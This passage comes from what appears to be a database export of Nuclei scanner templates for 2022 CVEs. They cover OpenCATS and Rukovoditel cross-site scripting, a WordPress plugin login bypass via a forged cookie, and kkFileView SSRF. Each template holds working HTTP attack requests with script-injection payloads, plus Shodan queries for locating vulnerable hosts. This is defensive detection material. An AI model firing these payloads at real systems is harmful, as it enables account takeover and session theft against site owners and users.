the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_callback.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43016\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43016\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.39871\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve2022,cve,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST 
/index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /index.php?m=toolbar&callback=&a=authenticate HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'EVAL='\n - 'cats_connected'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204ba6921db05acebd0c6310fe279d69a0241eea61a56fe98076c3acbbbde12bd302206466948902e44608beedb1c1ae6d7c10f935634a10fc2a843fc9362270070d4d:922c64590222798bb761d5b6d8e72950", "hash": "2beb45f9a61fcd1f50ddc9bc4fda80ad", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ac" }, "name": "CVE-2022-43017.yaml", "content": "id: CVE-2022-43017\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43017\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43017\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.40565\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve,cve2022,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\">&isPopup=0 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'CATS='\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dd87ebfe6d6cf8f91e1b8675a0783c24940fcd4f08ce35c16db45abbe6e0113b022015d1ef8dd35c27d9ae583a14fe81180a74d4d6b16e278c22df6dcc6eaf331d12:922c64590222798bb761d5b6d8e72950", "hash": "32ae56445ac21d86c6b06614ff904fe7", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": 
"66477a413521042ccf3085ad" }, "name": "CVE-2022-43018.yaml", "content": "id: CVE-2022-43018\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: |\n Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43018\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43018\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.40565\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve,cve2022,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email= HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ':0'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022037f2672c9d3f40fe1c475aba72b2b7a715a05dcaf7c74852c8259fb3d9b56ef7022049e93237d4d7b9f02e2381b97d9251f3f7ff608f1214edb5e5a4926275f7d60f:922c64590222798bb761d5b6d8e72950", "hash": "e89679512b667e651177068176c4551d", "level": 
4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ae" }, "name": "CVE-2022-4305.yaml", "content": "id: CVE-2022-4305\n\ninfo:\n name: Login as User or Customer < 3.3 - Privilege Escalation\n author: r3Y3r53\n severity: critical\n description: |\n The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.\n remediation: Fixed in version 3.3\n reference:\n - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4305\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4305\n cwe-id: CWE-269\n epss-score: 0.04963\n epss-percentile: 0.92644\n cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\\(user_switching\\):*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wp-buy\n product: login_as_user_or_customer_\\(user_switching\\)\n framework: wordpress\n publicwww-query: /wp-content/plugins/login-as-customer-or-user\n tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy\n\nhttp:\n - raw:\n - |\n GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1\n Host: {{Hostname}}\n Cookie: loginas_old_user_id=1\n - |\n GET /wp-admin/users.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - contains(header_2, \"text/html\")\n - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')\n condition: and\n# digest: 4a0a00473045022100f40d1c4af7efd3f85e0f706dd731556e8b8c115e956fbb33fde0a16ebaa3183002200422ebf2a940f67382378fbf9b001f144f552465c6679e84b40560db876877cb:922c64590222798bb761d5b6d8e72950", "hash": "2cac4e672d5852b01cf801cea751b81c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085af" }, "name": 
"CVE-2022-4306.yaml", "content": "id: CVE-2022-4306\n\ninfo:\n name: WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: Fixed in version 1.5.4.\n reference:\n - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4306\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-4306\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: panda_pods_repeater_field_project\n product: panda_pods_repeater_field\n framework: wordpress\n tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 
HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"alert(document.domain)\")'\n - 'contains(body_2, \"panda-repeater-add-new\")'\n condition: and\n# digest: 4b0a00483046022100d682dc0deb41b55d00a3fa9025b6e1d5ec6a980ea73308b00592db5f9c317eed022100bbb00e701c82b70533ae2125cbbe1ea9c19ba5ffe06aa67a1830a8d432c0fd9c:922c64590222798bb761d5b6d8e72950", "hash": "9b76eb990f6f92a483f4b00d6f46b00c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b0" }, "name": "CVE-2022-43140.yaml", "content": "id: CVE-2022-43140\n\ninfo:\n name: kkFileView 4.1.0 - Server-Side Request Forgery\n author: Co5mos\n severity: high\n description: |\n kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, potential data leakage, and further attacks on the server.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SSRF vulnerability in kkFileView 4.1.0.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/392\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43140\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-43140\n cwe-id: CWE-918\n epss-score: 0.15211\n epss-percentile: 0.95316\n cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n fofa-query: app=\"kkFileView\"\n tags: 
cve2022,cve,ssrf,kkFileview,keking\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"

    Interactsh Server

    \"\n# digest: 4b0a00483046022100b810cd7135af4ac4280bcbb9a33af48834cfab8a8a104301dc1233773a645af5022100df9ffc099f882bc743890dc78cc2de64f4a92da50a2bd3d1bc9193d1dedd1f1d:922c64590222798bb761d5b6d8e72950", "hash": "3bb792137aa29eec8bb398197b90a69c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b1" }, "name": "CVE-2022-43164.yaml", "content": "id: CVE-2022-43164\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/4\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43164\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43164\n cwe-id: CWE-79\n epss-score: 0.003\n epss-percentile: 0.66367\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4a0a004730450220374b4e737a4fea8aa81413415c068ca4f57e725140e681a365c5fbfb01e99a5e02210083a924bcf9686759e21f03d28055d3ee09a2927940b21ea9c304314f32ab045e:922c64590222798bb761d5b6d8e72950", "hash": "2ede1f1b6607ab3a456043ee7f3889fb", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b2" }, "name": "CVE-2022-43165.yaml", "content": "id: CVE-2022-43165\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking \"Create\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/5\n - http://rukovoditel.com/\n - 
https://nvd.nist.gov/vuln/detail/CVE-2022-43165\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43165\n cwe-id: CWE-79\n epss-score: 0.00197\n epss-percentile: 0.56575\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=&sort_order=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100a958b45d49983e3429a0ec6f07591152011ae00c2d6650b2ba2d7cf45ee7cc59022100e8ddb96382cc892ab1f074d69a55545f04831c4f6646fa78ec57870208a9db0d:922c64590222798bb761d5b6d8e72950", "hash": "ee3f1e5a8b1260a952ca0b5eac8c2f2a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b3" }, "name": "CVE-2022-43166.yaml", "content": "id: CVE-2022-43166\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site 
scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add New Entity\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/2\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43166\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43166\n cwe-id: CWE-79\n epss-score: 0.00197\n epss-percentile: 0.56575\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, 
\"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a00463044022073ffd18a48fa52cec919649b657d84376a793ad133c7b39d97b8d185b58a3d0c022078b83eb05ade26cc3df8dd6618ade63db583eea4d1911033468084f1cb2bf959:922c64590222798bb761d5b6d8e72950", "hash": "8d79801e5db65dd3ebf9df8730f66bab", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b4" }, "name": "CVE-2022-43167.yaml", "content": "id: CVE-2022-43167\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/7\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43167\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43167\n cwe-id: CWE-79\n epss-score: 0.00197\n epss-percentile: 0.56575\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login 
HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100ca9e12798bdb85ab1b55ededba807df802f821b90f81117202c99e86869a86a0022100e8b453b46860085a0f2cbe7d66113b72e4e39f539ff8c745b3f9db7ce1d3c2a8:922c64590222798bb761d5b6d8e72950", "hash": "58e66808a59e537305bcfe90e42f668a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b5" }, "name": "CVE-2022-43169.yaml", "content": "id: CVE-2022-43169\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add New Group\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n 
Upgrade Rukovoditel to a version higher than 3.2.1 or apply the necessary patches provided by the vendor to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/3\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43169\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43169\n cwe-id: CWE-79\n epss-score: 0.003\n epss-percentile: 0.66367\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100ceebff44463a50c3f8cdfd03eb5a3449476a6d347a5014da85b0dc03d249e1dc02210089091f4d3daefd628b027f9ba865a756c4f31281aec45252b014c6653e2ebb28:922c64590222798bb761d5b6d8e72950", "hash": "f07d78ef19c41ff01958f58b1e86a546", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b6" }, "name": 
"CVE-2022-43170.yaml", "content": "id: CVE-2022-43170\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add info block\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/6\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43170\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43170\n cwe-id: CWE-79\n epss-score: 0.26563\n epss-percentile: 0.96323\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
form_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a00463044022050159dcb3305abbac67f828aa26ed8c27682f0fab2c0ebe28a29cbbaf8adb450022065e31b15fafe74e1177ad1e2787cf1d8483181eae49e031828eb791e6640e622:922c64590222798bb761d5b6d8e72950", "hash": "41502d9ed137cb84672f4b48d3776e08", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b7" }, "name": "CVE-2022-43185.yaml", "content": "id: CVE-2022-43185\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/1\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43185\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n 